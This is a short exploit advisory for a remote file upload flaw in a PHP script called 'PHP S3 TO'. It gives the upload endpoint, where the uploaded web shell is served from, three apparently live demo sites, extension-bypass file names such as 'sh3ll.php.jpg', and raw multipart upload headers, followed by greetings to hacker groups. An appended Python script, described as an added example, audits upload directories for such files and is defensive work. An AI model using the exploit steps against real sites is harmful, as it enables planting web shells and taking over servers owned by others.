######################################
Exploit Title : "PHP S3 TO" Remote File Upload
Download : http://php.s3.to/script.php
Author : MR.XpR
Tested on : LinuX R3dH4t
Bug discovered by : IRANHACK SecuRITY TEAM
#####################################

[+] Exploit :
[Protocol]Site.CoM/[dir]/up/upload.php
--------------------------------------------------------------
[+] Load files From :
[Protocol]Site.CoM/[dir]/up/img/Sh3ll.php.jpg
--------------------------------------------------------------
[+] Demo :
http://security2600.sakura.ne.jp/up/upload.php
http://omame.dnsalias.net/up/upload.php
http://diaros.net/up/upload.php
--------------------------------------------------------------
[+] Information :
This bug allows uploading TXT, PHP, JPG and PNG files.
Change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg
If it doesn't work, use the Tamper Data Firefox plugin.
--------------------------------------------------------------
[+] Upload Headers :
114782935826962\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile"; filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition: form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data; name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n

[+] Special TnX To :
Mr.XpR - Syamak Black - UnknowN - MR.EBI - Farbod Ezaril - Samim.s
Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King
Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT
IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM
joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz
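
For administrators running this script, an audit of the stored-upload directory for the file names and content the advisory describes. This is an added example, not part of the original advisory or the script's own code; `SCRIPT_EXTS`, the function names and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed list of extensions a PHP-enabled server may execute; match your handler config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Leading bytes of the image types the advisory names (JPG, PNG).
IMAGE_MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
PHP_TAG = re.compile(rb"<\?php", re.I)
MAX_READ = 1048576  # MAX_FILE_SIZE from the advisory's upload form

def audit_file(path):
    """Return the reasons a stored upload looks suspicious (empty list if none)."""
    parts = path.name.lower().split(".")
    findings = []
    # Script extension in any position after the base name (x.php.jpg, x.php%0%0.1.jpg).
    if any(re.match(r"[a-z0-9]*", p).group(0) in SCRIPT_EXTS for p in parts[1:]):
        findings.append("script extension in name")
    if "%" in path.name:
        findings.append("percent sequence in name")
    with path.open("rb") as fh:
        data = fh.read(MAX_READ)
    magic = IMAGE_MAGIC.get(path.suffix.lower().lstrip("."))
    if magic and not data.startswith(magic):
        findings.append("content does not match image extension")
    if PHP_TAG.search(data):
        findings.append("PHP open tag in content")
    return findings

def scan_dir(root):
    """Map file name -> findings for every flagged file under root."""
    results = {p.name: audit_file(p) for p in Path(root).rglob("*") if p.is_file()}
    return {name: why for name, why in results.items() if why}

def demo():
    samples = {  # constructed sample files for a throwaway up/img/ directory
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "notes.txt": b"plain text upload\n",
        "Sh3ll.php.jpg": b"<?php /* constructed placeholder */ ?>",
        "sh3ll.php%0%0.1.jpg": b"\xff\xd8\xff\xe0<?PHP /* constructed */ ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        img = Path(tmp, "up", "img")
        img.mkdir(parents=True)
        for fname, body in samples.items():
            (img / fname).write_bytes(body)
        return scan_dir(tmp)

if __name__ == "__main__":
    print(demo())
```

Point `scan_dir` at the real `up/img/` directory to triage an existing install; the second sample shows why a magic-byte check alone is not sufficient.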